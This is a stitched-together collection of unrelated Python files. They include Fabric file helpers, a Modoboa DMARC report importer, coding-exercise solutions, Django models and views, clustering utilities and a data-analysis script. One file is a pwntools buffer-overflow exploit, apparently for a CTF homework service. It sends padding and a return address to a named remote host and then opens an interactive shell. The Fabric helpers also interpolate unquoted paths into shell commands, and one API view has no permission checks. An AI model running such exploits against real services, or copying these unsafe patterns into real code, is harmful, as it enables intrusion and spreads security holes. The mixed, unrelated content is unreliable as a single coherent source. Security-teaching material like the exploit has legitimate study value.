__author__ = 'scorpius'
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, with_statement
from cuisine import file_attribs as attributes
from cuisine import file_attribs_get as attributes_get
from cuisine import file_ensure as ensure
from cuisine import file_is_file as exists
from cuisine import file_is_link as is_link
from cuisine import file_link as link
from cuisine import file_local_read as read_local
from cuisine import file_read as read
from cuisine import file_update as update
from cuisine import file_write as write
from fabric.contrib.files import append, comment, contains, sed, uncomment
from revolver import core
from revolver.decorator import inject_use_sudo
append = inject_use_sudo(append)
comment = inject_use_sudo(comment)
contains = inject_use_sudo(contains)
sed = inject_use_sudo(sed)
uncomment = inject_use_sudo(uncomment)
write = inject_use_sudo(write)
def temp(mode=None, owner=None, group=None):
path = core.run('mktemp').stdout
attributes(path, mode=mode, owner=owner, group=group)
return path
def remove(location, recursive=False, force=True):
force = '-f' if force else ''
recursive = '-r' if recursive else ''
core.run('rm %s %s %s' % (force, recursive, location))
def touch(location, mode=None, owner=None, group=None):
core.run('touch %s' % location)
attributes(location, mode=mode, owner=owner, group=group)
def copy(source, destination, force=True, mode=None, owner=None, group=None):
force = '-f' if force else ''
core.run('cp %s %s %s' % (force, source, destination))
attributes(destination, mode=mode, owner=owner, group=group)
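# Hedged usage sketch: inside a Fabric task (with an active connection), the
# helpers above could be composed like this; the paths and modes are illustrative.
def _example_usage():
    tmp = temp(mode='600', owner='root', group='root')  # remote mktemp + chmod/chown
    copy('/etc/motd', tmp, mode='644')                  # cp -f /etc/motd <tmp>
    remove(tmp, force=True)                             # rm -f <tmp>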
|
# Author: George K. Holt
# License: MIT
# Version: 0.1
"""
Part of EPOCH Generate Particles Files.
This file should contain a 2-dimensional particle number density distribution as
a Python function called number_density_2d.
"""
import numpy as np
def gaussian(x, x0, w):
'''A simple Gaussian function centred on x0 with waist w.'''
return np.exp(-(x - x0) ** 2 / (w ** 2))
def number_density_2d(x, y):
'''Return particle number density for given x-y-coordinate.'''
return 1e25 * gaussian(x, 0.2e-6, 1e-6) * gaussian(y, -0.1e-6, 0.5e-6)
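# Quick self-check (sketch): number_density_2d broadcasts over numpy arrays, so
# it can be evaluated directly on a meshgrid; the peak should sit near
# (x, y) = (0.2e-6, -0.1e-6) with amplitude ~1e25.
if __name__ == '__main__':
    x = np.linspace(-2e-6, 2e-6, 101)
    y = np.linspace(-1e-6, 1e-6, 51)
    X, Y = np.meshgrid(x, y)
    density = number_density_2d(X, Y)
    print(density.max())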
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
#context.log_level = 'debug'
# Byte sequence alias
A8 = 8 * b'A'
def main():
payload = 3 * A8
payload += p64(0x4011a1)
#proc = process('./CafeOverflow')
proc = remote('hw00.zoolab.org', 65534)
proc.recvuntil(':')
proc.send(payload)
proc.interactive()
if __name__ == '__main__':
main()
|
"""Internal library."""
import concurrent.futures
import datetime
import email
import fileinput
import getpass
import imaplib
import zipfile
import gzip
import sys
import tldextract
from defusedxml.ElementTree import fromstring
from dns import resolver, reversename
import magic
import six
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from django.utils.encoding import smart_str
from django.utils.translation import gettext as _
from modoboa.admin import models as admin_models
from modoboa.parameters import tools as param_tools
from . import constants
from . import models
ZIP_CONTENT_TYPES = [
"application/x-zip-compressed",
"application/x-zip",
"application/zip",
"application/gzip",
"application/octet-stream",
"text/xml",
]
FILE_TYPES = [
"text/plain",
"text/xml",
]
def import_record(xml_node, report):
"""Import a record."""
record = models.Record(report=report)
row = xml_node.find("row")
record.source_ip = row.find("source_ip").text
record.count = int(row.find("count").text)
policy_evaluated = row.find("policy_evaluated")
record.disposition = policy_evaluated.find("disposition").text
record.dkim_result = policy_evaluated.find("dkim").text
record.spf_result = policy_evaluated.find("spf").text
reason = policy_evaluated.find("reason")
if reason:
record.reason_type = smart_str(reason.find("type").text)[:14]
if record.reason_type not in constants.ALLOWED_REASON_TYPES:
record.reason_type = "other"
comment = reason.find("comment").text or ""
record.reason_comment = comment
identifiers = xml_node.find("identifiers")
header_from = identifiers.find("header_from").text.split(".")
domain = None
while len(header_from) >= 2:
domain = admin_models.Domain.objects.filter(
name=".".join(header_from)).first()
if domain is not None:
record.header_from = domain
break
header_from = header_from[1:]
if domain is None:
print("Invalid record found (domain not local)")
return None
record.save()
auth_results = xml_node.find("auth_results")
for rtype in ["spf", "dkim"]:
rnode = auth_results.find(rtype)
if not rnode:
continue
models.Result.objects.create(
record=record, type=rtype, domain=rnode.find("domain").text,
result=rnode.find("result").text)
@transaction.atomic
def import_report(content):
"""Import an aggregated report."""
root = fromstring(content, forbid_dtd=True)
metadata = root.find("report_metadata")
print(
"Importing report {} received from {}".format(
metadata.find("report_id").text,
metadata.find("org_name").text)
)
reporter, created = models.Reporter.objects.get_or_create(
email=metadata.find("email").text,
defaults={"org_name": metadata.find("org_name").text}
)
qs = models.Report.objects.filter(
reporter=reporter, report_id=metadata.find("report_id").text)
if qs.exists():
print("Report already imported.")
return
report = models.Report(reporter=reporter)
report.report_id = metadata.find("report_id").text
date_range = metadata.find("date_range")
report.start_date = timezone.make_aware(
datetime.datetime.fromtimestamp(int(date_range.find("begin").text))
)
report.end_date = timezone.make_aware(
datetime.datetime.fromtimestamp(int(date_range.find("end").text))
)
policy_published = root.find("policy_published")
for attr in ["domain", "adkim", "aspf", "p", "sp", "pct"]:
node = policy_published.find(attr)
if node is None or not node.text:
if attr == "sp":
node = fromstring('<sp>unstated</sp>', forbid_dtd=True)
else:
print(f"Report skipped because of malformed data (empty {attr})")
return
setattr(report, "policy_{}".format(attr), node.text)
report.save()
for record in root.findall("record"):
import_record(record, report)
def import_archive(archive, content_type=None):
"""Import reports contained inside (file pointer)
- a zip archive,
- a gzip file,
- a xml file.
"""
if content_type == "text/xml":
import_report(archive.read())
elif content_type in ["application/gzip", "application/octet-stream"]:
with gzip.GzipFile(mode="r", fileobj=archive) as zfile:
import_report(zfile.read())
else:
with zipfile.ZipFile(archive, "r") as zfile:
for fname in zfile.namelist():
import_report(zfile.read(fname))
def import_report_from_email(content):
"""Import a report from an email."""
if isinstance(content, six.string_types):
msg = email.message_from_string(content)
elif isinstance(content, six.binary_type):
msg = email.message_from_bytes(content)
else:
msg = email.message_from_file(content)
err = False
for part in msg.walk():
if part.get_content_type() not in ZIP_CONTENT_TYPES:
continue
try:
fpo = six.BytesIO(part.get_payload(decode=True))
# Try to get the actual file type of the buffer
# required to make sure we are dealing with an XML file
file_type = magic.Magic(uncompress=True, mime=True).from_buffer(fpo.read(2048))
fpo.seek(0)
if file_type in FILE_TYPES:
import_archive(fpo, content_type=part.get_content_type())
except (OSError, IOError):
print('Error: the attachment does not match the mimetype')
err = True
else:
fpo.close()
if err:
# Return EX_DATAERR code <data format error> available
# at sysexits.h file
# (see http://www.postfix.org/pipe.8.html)
sys.exit(65)
def import_report_from_stdin():
"""Parse a report from stdin."""
content = six.StringIO()
for line in fileinput.input([]):
content.write(line)
content.seek(0)
if not content.getvalue():
return
import_report_from_email(content)
def import_from_imap(options):
"""Import reports from an IMAP mailbox."""
obj = imaplib.IMAP4_SSL if options["ssl"] else imaplib.IMAP4
conn = obj(options["host"])
username = input("Username: ")
password = getpass.getpass(prompt="Password: ")
conn.login(username, password)
conn.select(options["mailbox"])
type, msg_ids = conn.search(None, "ALL")
for msg_id in msg_ids[0].split():
typ, content = conn.fetch(msg_id, "(RFC822)")
for response_part in content:
if isinstance(response_part, tuple):
import_report_from_email(response_part[1])
conn.close()
def week_range(year, weeknumber):
"""Return start and end dates of a given week."""
tz = timezone.get_current_timezone()
fmt = "%Y-%W-%w"
start_week = datetime.datetime.strptime(
"{}-{}-{}".format(year, weeknumber, 1), fmt)
end_week = datetime.datetime.strptime(
"{}-{}-{}".format(year, weeknumber, 0), fmt)
return start_week.replace(tzinfo=tz), end_week.replace(tzinfo=tz)
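# Worked example: with the "%Y-%W-%w" format, day 1 is the Monday of week
# `weeknumber` and day 0 is the Sunday that ends it, so week_range(2023, 10)
# should give the timezone-aware midnights of 2023-03-06 (Monday) and
# 2023-03-12 (Sunday).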
def insert_record(target: dict, record, name: str) -> None:
"""Add a record."""
if name not in target:
target[name] = {}
if record.source_ip not in target[name]:
target[name][record.source_ip] = {
"total": 0,
"spf": {"success": 0, "failure": 0},
"dkim": {"success": 0, "failure": 0}
}
target[name][record.source_ip]["total"] += record.count
for typ in ["spf", "dkim"]:
result = getattr(record, "{}_result".format(typ))
key = "success" if result == "pass" else "failure"
target[name][record.source_ip][typ][key] += record.count
def get_aligment_stats(domain, period=None) -> dict:
"""Retrieve aligment statistics for given domain."""
if not period:
year, week, day = timezone.now().isocalendar()
week -= 1
period = f"{year}-{week}"
else:
year, week = period.split("-")
if not year or not week:
period = f"{year}-{week}"
daterange = week_range(year, week)
qargs = (
(Q(report__start_date__gte=daterange[0],
report__start_date__lte=daterange[1]) |
Q(report__end_date__gte=daterange[0],
report__end_date__lte=daterange[1])) &
Q(header_from=domain)
)
all_records = models.Record.objects.filter(qargs)
stats: dict = {
"aligned": {},
"trusted": {},
"forwarded": {},
"failed": {}
}
dns_names = {}
if param_tools.get_global_parameter("enable_rlookups"):
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1.0
dns_resolver.lifetime = 1.0
def get_domain_name_from_ip(ip):
addr = reversename.from_address(ip)
try:
resp = dns_resolver.query(addr, "PTR")
ext = tldextract.extract(str(resp[0].target))
if not ext.suffix: # invalid PTR record
raise resolver.NXDOMAIN()
return (ip, '.'.join((ext.domain, ext.suffix)).lower())
except (resolver.NXDOMAIN, resolver.YXDOMAIN,
resolver.NoAnswer, resolver.NoNameservers,
resolver.Timeout):
return (None, None)
ips = (r.source_ip for r in all_records)
with concurrent.futures.ThreadPoolExecutor(max_workers=16) as pool:
dns_names = {i: n for (i, n) in
list(pool.map(get_domain_name_from_ip, ips))}
for record in all_records:
name = dns_names.get(record.source_ip, _("Not resolved"))
if record.dkim_result == "pass" and record.spf_result == "pass":
insert_record(stats["aligned"], record, name)
elif record.dkim_result == "pass" or record.spf_result == "pass":
insert_record(stats["trusted"], record, name)
elif record.reason_type == "local_policy" and record.reason_comment.startswith("arc=pass"):
insert_record(stats["forwarded"], record, name)
else:
insert_record(stats["failed"], record, name)
return stats
|
# Problem description
# You are given n non-negative integers. You want to make a target number by adding or subtracting these numbers as appropriate. For example, there are the following five ways to make 3 from [1, 1, 1, 1, 1]:
# -1+1+1+1+1 = 3
# +1-1+1+1+1 = 3
# +1+1-1+1+1 = 3
# +1+1+1-1+1 = 3
# +1+1+1+1-1 = 3
# Given an array numbers of usable numbers and a target number target, write a solution function that returns the number of ways the target number can be made by adding and subtracting the numbers.
# Constraints
# The number of given integers is at least 2 and at most 20.
# Each number is a natural number between 1 and 50.
# The target number is a natural number between 1 and 1000.
# Example input/output
# numbers target return
# [1, 1, 1, 1, 1] 3 5
def solution(numbers, target):
stack = [0]
while numbers:
number = numbers.pop(0)
sub = []
for i in stack:
sub.append(i + number)
sub.append(i - number)
stack = sub
return stack.count(target)
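# Example (sketch): the sample case from the problem statement.
if __name__ == '__main__':
    print(solution([1, 1, 1, 1, 1], 3))  # expected: 5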
|
"""
698. Partition to K Equal Sum Subsets
Given an integer array nums and an integer k, return true if it is possible to divide this array into k non-empty subsets whose sums are all equal.
Example 1:
Input: nums = [4,3,2,3,5,2,1], k = 4
Output: true
Explanation: It's possible to divide it into 4 subsets (5), (1, 4), (2,3), (2,3) with equal sums.
Example 2:
Input: nums = [1,2,3,4], k = 3
Output: false
"""
from typing import List
class Solution:
'''
time complexity : O(k * 2^n)
it takes the inner recursion 2^n time to find a good subset.
and we need to do this for k rounds
'''
def canPartitionKSubsets(self, nums: List[int], k: int) -> bool:
if (sum(nums) % k != 0) or (k > len(nums)) or (max(nums) > sum(nums) // k):
return False
def backtrack(nums, k, visited, targetSubsetSum, curSubsetSum, nextIdx) -> bool:
if k == 1:
return True
if curSubsetSum == targetSubsetSum:
return backtrack(nums, k - 1, visited, targetSubsetSum, 0, 0)
for i in range(nextIdx, len(nums)):
if (not visited[i]) and (nums[i] + curSubsetSum <= targetSubsetSum):
visited[i] = True # choose
if backtrack(nums, k, visited, targetSubsetSum, curSubsetSum + nums[i], i + 1):
return True
visited[i] = False # unchoose/backtrack
return False
return backtrack(nums, k, [False] * len(nums), sum(nums) // k, 0, 0)
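# Example (sketch): the two cases from the problem statement.
if __name__ == '__main__':
    print(Solution().canPartitionKSubsets([4, 3, 2, 3, 5, 2, 1], 4))  # expected: True
    print(Solution().canPartitionKSubsets([1, 2, 3, 4], 3))           # expected: False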
|
from _typeshed import Incomplete
def write_dot(G, path) -> None: ...
def read_dot(path): ...
def from_pydot(P): ...
def to_pydot(N): ...
def graphviz_layout(G, prog: str = "neato", root: Incomplete | None = None): ...
def pydot_layout(G, prog: str = "neato", root: Incomplete | None = None): ...
|
#
# @lc app=leetcode.cn id=797 lang=python3
#
# [797] All Paths From Source to Target
#
# @lc code=start
from typing import List
class Solution:
def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:
"""
Multi-way (N-ary) tree traversal framework
"""
# 30/30 cases passed (52 ms)
# Your runtime beats 20.08 % of python3 submissions
# Your memory usage beats 66.14 % of python3 submissions (16.1 MB)
self.res = []
path = []
self.traverse(graph, 0, path)
return self.res
def traverse(self, graph, s, path):
# Add the current node s to the path
path.append(s)
if s == len(graph) - 1:
# Reached the tail node len(graph) - 1
self.res.append(path[:])
path.pop()
return
# Recurse into each neighbor
for v in graph[s]:
self.traverse(graph, v, path)
# Remove the current node s from the path
path.pop()
# @lc code=end
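# Example (sketch): graph = [[1, 2], [3], [3], []] has exactly two paths from
# node 0 to node 3.
if __name__ == '__main__':
    print(Solution().allPathsSourceTarget([[1, 2], [3], [3], []]))  # expected: [[0, 1, 3], [0, 2, 3]]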
|
from database.connection.mysql_connection import get_session
class GenericDao():
def insert_record(self,record):
session = get_session()
session.add(record)
session.commit()
session.flush()
print('inserted record :: {}'.format(record))
def get_all_records(self, Type):
return get_session().query(Type).all()
|
from rest_framework import generics
from .models import Signal, SignalResult
from . import permissions, serializers
class Signals(generics.ListAPIView):
queryset = Signal.objects.all()
serializer_class = serializers.SignalSerializer
permission_classes = []
class SignalResults(generics.ListAPIView):
queryset = SignalResult.objects.filter(signal__creator_profile__user_id=13)
serializer_class = serializers.SignalResultSerializer
permission_classes = []
|
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
import math
#Module containing functions used for Kmeans clustering
def closest_centroid(x,centroids):
"""Function for finding the closest closest centroid
Input :
x := numpy array of data
centroids := list of centroids
Output:
out := numpy array of index of closest centroids"""
K =len(centroids)
N = len(x)
Distance = np.zeros((N,K))
for j in range(K):
mu = centroids[j]
Distance[:,j] = np.linalg.norm(x-mu,axis=1)
out = np.argmin(Distance,axis=1)
return out
def update_centroids(x,indices,K):
"""Function for updating centroids
Input:
x := numpy array of data
K:= number of centroids
indices := numpy array of indices of closest centroids
Output :
centroids, variance := updated list of centroids and list of variances
for each cluster"""
centroids = []
variances = []
for j in range(K):
x_closest = x[indices == j,:]
mu = np.mean(x_closest, axis = 0)
variance = np.dot((x_closest-mu).T,x_closest-mu)/len(x_closest)
centroids.append(mu)
variances.append(variance)
return centroids, variances
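# Minimal driver (sketch): alternate the two steps above on random 2-D data,
# seeding the centroids with K points drawn from the data. Assumes no cluster
# ends up empty (update_centroids would then average over an empty slice).
if __name__ == '__main__':
    np.random.seed(0)
    data = np.random.randn(200, 2)
    K = 3
    centroids = [data[i] for i in np.random.choice(len(data), K, replace=False)]
    for _ in range(10):
        indices = closest_centroid(data, centroids)
        centroids, variances = update_centroids(data, indices, K)
    print(centroids)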
|
from org.csstudio.opibuilder.scriptUtil import PVUtil
from org.csstudio.opibuilder.scriptUtil import ConsoleUtil
from java.lang import Thread, Runnable
sp1_high_set_2 = display.getWidget("Text_Update_gauge2_sp1_high_set")
sp1_low_set_2 = display.getWidget("Text_Update_gauge2_sp1_low_set")
sp2_high_set_2 = display.getWidget("Text_Update_gauge2_sp2_high_set")
sp2_low_set_2 = display.getWidget("Text_Update_gauge2_sp2_low_set")
sp1_high_set_2PV = sp1_high_set_2.getPV()
sp1_low_set_2PV = sp1_low_set_2.getPV()
sp2_high_set_2PV = sp2_high_set_2.getPV()
sp2_low_set_2PV = sp2_low_set_2.getPV()
# The *_orig_2 widgets are assumed to be defined elsewhere in this display script.
sp1_high_set_2PV.setValue(PVUtil.getDouble(sp1_high_set_orig_2))
sp1_low_set_2PV.setValue(PVUtil.getDouble(sp1_low_set_orig_2))
sp2_high_set_2PV.setValue(PVUtil.getDouble(sp2_high_set_orig_2))
sp2_low_set_2PV.setValue(PVUtil.getDouble(sp2_low_set_orig_2))
|
import csv, pdb, copy
from random import randrange, randint
import time
import random
from datetime import timedelta, datetime
from dateutil.relativedelta import relativedelta
def random_date(start, end):
delta = end - start
int_delta = (delta.days * 24 * 60 * 60) + delta.seconds
random_second = randrange(int_delta)
return start + timedelta(seconds=random_second)
with open("data/routes.csv", "r") as in_file:
with open("new_routes.csv", "w") as out_file:
writer = csv.writer(out_file, lineterminator="\n")
reader = csv.reader(in_file)
all = []
headers = next(reader)
price_index = headers.index("Date")
all.append(headers)
for row in reader:
row[price_index] = random_date(datetime.now(), datetime.now()+relativedelta(years=1)).strftime("%Y-%m-%d")
all.append(row)
writer.writerows(all)
|
# coding: utf-8
import socket
import lglass.rpsl
import lglass.database.base
@lglass.database.base.register
class WhoisClientDatabase(lglass.database.base.Database):
""" Simple blocking whois client database """
def __init__(self, hostspec):
self.hostspec = hostspec
def get(self, type, primary_key):
try:
return self.find(primary_key, types=[type], flags="-r")[-1]
except IndexError:
raise KeyError(type, primary_key)
def find(self, primary_key, types=None, flags=None):
send_buffer = b""
recv_buffer = b""
if types is not None:
send_buffer += "-T {types} ".format(types=",".join(types)).encode()
if flags is not None:
send_buffer += flags.encode()
send_buffer += b" "
send_buffer += "{key}".format(key=primary_key).encode()
send_buffer += b"\r\n"
with socket.create_connection(self.hostspec) as sock:
while len(send_buffer):
sent = sock.send(send_buffer)
send_buffer = send_buffer[sent:]
while True:
recvd = sock.recv(1024)
if not len(recvd):
break
recv_buffer += recvd
lines = recv_buffer.decode(errors="replace").splitlines()
lines_iter = iter(lines)
objs = []
while True:
obj = lglass.rpsl.Object.from_iterable(lines_iter, pragmas={
"stop-at-empty-line": True
})
if not obj:
break
objs.append(obj)
return objs
def list(self):
raise NotImplementedError("list() is not supported for WhoisClientDatabase")
def save(self):
raise NotImplementedError("save() is not supported for WhoisClientDatabase")
def delete(self):
raise NotImplementedError("delete() is not supported for WhoisClientDatabase")
@classmethod
def from_url(cls, url):
return cls((url.hostname, url.port if url.port else 43))
@lglass.database.base.register
class RIPEDatabase(WhoisClientDatabase):
def __init__(self, hostspec=None):
if hostspec is None:
hostspec = ("whois.ripe.net", 43)
WhoisClientDatabase.__init__(self, hostspec)
def find(self, primary_key, types=None, flags=None):
if flags is not None:
flags = "-B " + flags
else:
flags = "-B"
return WhoisClientDatabase.find(self, primary_key, types, flags)
def schema(self, type):
results = self.find(type, flags="-t")
if len(results) == 0:
raise KeyError("schema({})".format(type))
return lglass.rpsl.RIPESchemaObject(results[0])
@classmethod
def from_url(cls, url):
return cls()
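# Usage sketch (requires network access; the server and key are illustrative):
if __name__ == '__main__':
    db = WhoisClientDatabase(("whois.ripe.net", 43))
    for obj in db.find("AS3333", types=["aut-num"]):
        print(obj)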
|
#from mail.models import*
from workstatus.mail.models import Message, User
def addMessage(user, email1, content, time1):
"""adds message to db"""
tempMessage = Message(user = user, emailaddress = email1, content = content, time1 = time1)
tempMessage.save()
def addUser(name, address, first):
user = User(username = name, email = address, first_name = first)
user.save()
|
from django.db import models
from django.contrib.auth.models import User
class ProductList(models.Model):
"""
Stores the list of products added by the couples
"""
name = models.CharField(max_length=200)
brand = models.CharField(max_length=200, blank=True)
price = models.FloatField()
in_stock_quantity = models.IntegerField()
def __str__(self):
return self.name
class Customer(models.Model):
"""
Stores the couple information
"""
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True)
email = models.CharField(max_length=100, null=True)
def __str__(self):
return self.name
class Order(models.Model):
"""
Stores the orders placed by the customers
"""
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, null=True, blank=True)
create_dt = models.DateTimeField(auto_now_add=True)
order_fulfilled = models.BooleanField(default=False)
class OrderLineItem(models.Model):
"""
Order line item information of each order.
1:M relationship with orders to Products
"""
product = models.ForeignKey(ProductList, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
customer = models.ForeignKey(Customer, on_delete=models.CASCADE, null=True, blank=True)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=200, null=True, default='Pending')
quantity_purchased = models.IntegerField(default=0, null=True, blank=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
|
if __name__ == '__main__':
students = list()
# for _ in range(int(input())):
# name = input()
# score = float(input())
# students.append([name, score])
students.append(['Prashant', 32])
students.append(['Pallavi', 36])
students.append(['Dheeraj', 39])
students.append(['Shivam', 40])
print('\ninitial')
for x in students:
print(f'{x[0]} {x[1]}')
minItem = min(x[1] for x in students)
print(f'\nmin {minItem}')
students = list(filter(lambda x: x[1] > minItem, students))
print('\nwithout min')
for x in students:
print(f'{x[0]} {x[1]}')
minItem = min(x[1] for x in students)
print(f'\nmin {minItem}')
students = list(filter(lambda x: x[1] == minItem, students))
print('\nrunner-ups')
for x in students:
print(f'{x[0]} {x[1]}')
students.sort(key=lambda x: x[0], reverse=False)
print('final')
for x in students:
print(x[0])
|
# imports
import pandas as pd
import json
from sklearn.cluster import k_means
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor
import matplotlib.pyplot as plt
import numpy as np
import re
import matplotlib.pyplot as plt
# load dataset
raw_data = pd.read_csv("data/incident_event_log.csv")
# data preprocessing
# load preprocessing metadata
with open("data/preprocmd.json") as f:
md = json.load(f)
def map_categories(dataset, col_mappings):
results = dataset
for column_name in col_mappings.keys():
results = results.replace({column_name: col_mappings[column_name]})
return results
def extract_numval(x):
match = re.search(r'(\d+)', x)
if match:
result = int(match.group())
else:
result = int(-1) # default value
return result
# Transform categorical values to integers
incilog = map_categories(raw_data, md["col_mappings"])
for column_name in md["numval_cols"]:
incilog[column_name] = list(map(extract_numval, incilog[column_name]))
# Format dates
for column_name in md["datetime_cols"]:
incilog[column_name] = pd.to_datetime(incilog[column_name].map(lambda x: re.sub(r'\?', '', x)))
# Target variable
incilog["time_to_resolution"] = [td.seconds for td in (incilog["resolved_at"] - incilog["opened_at"])]
# Remove negative deltas (either wrong date entries in the resolved_at column or redundant incidents, already resolved)
incilog = incilog[incilog.time_to_resolution >= 0]
# Data segmentation
train, test = train_test_split(incilog, test_size=0.2, random_state=25)
# classify columns
excluded_cols = ["number"] + md["datetime_cols"]
categorical_cols = incilog.columns.difference(excluded_cols).difference(["time_to_resolution"])
# exploratory analysis
print(incilog.head().to_markdown())
# correlations with time_to_resolution
def res_correlation(variable):
return incilog[variable].corr(incilog.time_to_resolution)
correlations = pd.Series([res_correlation(col) for col in categorical_cols], index = categorical_cols)
# Highest "single-factor" correlations
top_15 = correlations[correlations.abs().sort_values(ascending=False).index].head(15)
print(top_15.to_markdown())
# plot distribution of categorical variables
def barplot(variable):
dist = pd.Series(incilog[variable]).value_counts()
plt.bar(range(len(dist)), dist)
fig1, axes1 = plt.subplots(5, 3, figsize=(12, 10))
fig1.subplots_adjust(wspace=0.4, hspace=0.6)
fig1.suptitle("Figure 1. Frequencies of the descriptive variables most correlated with the time_to_resolution")
for c in range(len(top_15.index)):
variable = top_15.index[c]
dist = pd.Series(incilog[variable]).value_counts()
range_vals = range(len(dist.keys()))
axes1[divmod(c, 3)[0]][divmod(c, 3)[1]].set_title(variable)
axes1[divmod(c, 3)[0]][divmod(c, 3)[1]].bar(range_vals, dist)
fig1.savefig("./images/top_15_barplots.png")
# First regressor and feature selection
# random forest
def fit_random_forest(train, features=categorical_cols, n_estimators=50):
forest_model = RandomForestRegressor(n_estimators=n_estimators, criterion="mse")
forest_model.fit(X=train.filter(items=features),
y=train.time_to_resolution)
return forest_model
forest_all_features = fit_random_forest(train, features=categorical_cols)
R2_all_features = forest_all_features.score(test.filter(items=categorical_cols), test.time_to_resolution)
print('R2 with all features: {:f}'.format(R2_all_features))
features_importance = categorical_cols[np.argsort(forest_all_features.feature_importances_)[::-1]]
print(pd.Series(features_importance[:15]).to_markdown())
# forest_top_15 = fit_random_forest(train, features=top_15.index)
# R2_top_15_corr = forest_top_15.score(test.filter(items=top_15.index), test.time_to_resolution)
# print('R2 with top 15 correlated features: {:f}'.format(R2_top_15))
# reduce the number of features in the model and evaluate
# first criterion for ranking features: pair-wise correlation with time_to_resolution
# R2_corr = [R2_top_15_corr]
R2_corr = []
for i in range(15, len(categorical_cols)):
features = correlations.abs().sort_values(ascending=False).index[:i]
forest = fit_random_forest(train, features)
R2_corr.append(forest.score(test.filter(items=features), test.time_to_resolution))
R2_corr.append(R2_all_features)
# second criterion for ranking features: features importance of full random forest
R2_imp = []
for i in range(15, len(categorical_cols)):
features = features_importance[:i]
forest = fit_random_forest(train, features)
R2_imp.append(forest.score(test.filter(items=features), test.time_to_resolution))
R2_imp.append(R2_all_features)
R2 = pd.DataFrame({"corr": R2_corr, "imp": R2_imp}, index = range(15, len(categorical_cols)+1))
R2.to_pickle("./R2.pkl")
fig2, axes2 = plt.subplots(1, 2, figsize=(12, 5))
fig2.subplots_adjust(hspace=0.6)
fig2.suptitle("Figure 2. Evolution of the random forest scores")
axes2[0].set_title("Features ranked by correlation")
axes2[0].plot(R2["corr"])
axes2[0].set_xlabel("Number of features")
axes2[0].set_ylabel("$R^2$")
axes2[0].set(ylim=(0.44, 0.65))
axes2[1].set_title("Features ranked by random forest importance")
axes2[1].plot(R2["imp"])
axes2[1].set_xlabel("Number of features")
axes2[1].set_ylabel("$R^2$")
axes2[1].set(ylim=(0.44, 0.65))
plt.savefig("./images/R2.png")
# clustering
def find_clusters(included_cols, max_clusters=11):
inertiae = {}
best_n_iters = {}
clusters = {}
for c in range(1, max_clusters):
km = k_means(incilog[included_cols], n_clusters=c, return_n_iter=True)
inertiae[c] = km[2]
best_n_iters[c] = km[3]
clusters[c] = km[1]
return inertiae, best_n_iters, clusters
# clusters with all categorical columns
inertiae_all, best_n_iters_all, clusters_all = find_clusters(categorical_cols)
fig3, axes3 = plt.subplots(1, 2, figsize=(12, 5))
fig3.subplots_adjust(hspace=0.6)
fig3.suptitle("Figure 3. K-means metrics")
axes3[0].set_title("K-means inertiae")
axes3[0].plot(inertiae_all.keys(), inertiae_all.values(), marker = "o")
axes3[0].set_xlabel("Number of clusters")
axes3[0].set_ylabel("Inertiae")
axes3[1].set_title("Number of iterations corresponding to the best results")
axes3[1].scatter(best_n_iters_all.keys(), best_n_iters_all.values())
axes3[1].set_xlabel("Number of clusters")
axes3[1].set_ylabel("Number of iterations")
plt.savefig("./images/k_means.png")
# Elbow: 4 clusters
incilog["cluster_all_vars"] = clusters_all[4]
# Explain the clusters
# important features on each cluster
def clusters_features_importance(cluster_column):
cluster_features_importance={}
for c in range(4):
forest = fit_random_forest(incilog[incilog[cluster_column] == c])
cluster_features_importance[c] = categorical_cols[np.argsort(forest.feature_importances_)[::-1]]
return cluster_features_importance
# not very conclusive
# find clusters using less features
inertiae_10, best_n_iters_10, clusters_10 = find_clusters(features_importance[0:10])
plt.plot(inertiae_10.keys(), inertiae_10.values(), marker = "o")
plt.scatter(best_n_iters_10.keys(), best_n_iters_10.values())
# 4 clusters
incilog["cluster_10_vars"] = clusters_10[4]
cf_10_var = clusters_features_importance("cluster_10_vars")
|
from conans import ConanFile, CMake
import os
class DefaultNameConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
generators = "cmake"
def build(self):
cmake = CMake(self)
cmake.configure(source_dir=self.conanfile_directory, build_dir="./")
cmake.build()
def imports(self):
self.copy(pattern="*.dll", dst="bin", src="bin")
self.copy(pattern="*.dylib", dst="bin", src="lib")
def test(self):
self.run("cd bin && .%senough" % os.sep)
assert os.path.exists(os.path.join(self.deps_cpp_info["zlib"].rootpath, "LICENSE"))
|
# coding: utf-8
# In[ ]:
'''
This function takes an integer input. If it is divisible by both 3 and 5 it prints FizzBuzz;
if it is divisible only by 3 it prints Fizz;
if it is divisible only by 5 it prints Buzz;
if it is divisible by neither, it prints 'Not divisible by either 3 or 5'.
'''
def FizzBuzz():
try:
num = int(input('Write your number here: '))
if num % 3 == 0 and num % 5 == 0:
print(num, 'FizzBuzz')
elif num % 3 == 0:
print(num, 'Fizz')
elif num % 5 == 0:
print(num, 'Buzz')
else:
print(num, 'Not divisible by either 3 or 5')
except:
print('Input a VALID Number')
restart = input('Do you wanna enter another number?, Y or N: ').lower()
if restart == 'y':
FizzBuzz()
else:
print('Bye!')
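# Non-interactive variant (sketch): the same branching as FizzBuzz above, but as
# a pure function that returns the label instead of prompting and printing.
def fizzbuzz_label(num):
    if num % 3 == 0 and num % 5 == 0:
        return 'FizzBuzz'
    elif num % 3 == 0:
        return 'Fizz'
    elif num % 5 == 0:
        return 'Buzz'
    return 'Not divisible by either 3 or 5'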
# In[ ]:
FizzBuzz()
|
from model import loss
import torch
import advertorch
import ctypes
import copy
from torch import equal
from torch import optim
from torch.autograd import Variable
import torch.nn as nn
from torchvision import datasets, transforms
import matplotlib.pyplot as plt
from data_loader.data_loader import BaseDataLoader, VGGFaceDataLoader
from model.models import VGG_Face_PubFig
from utils.metric import DSSIM
from model.optimizer import Adadelta, SGD
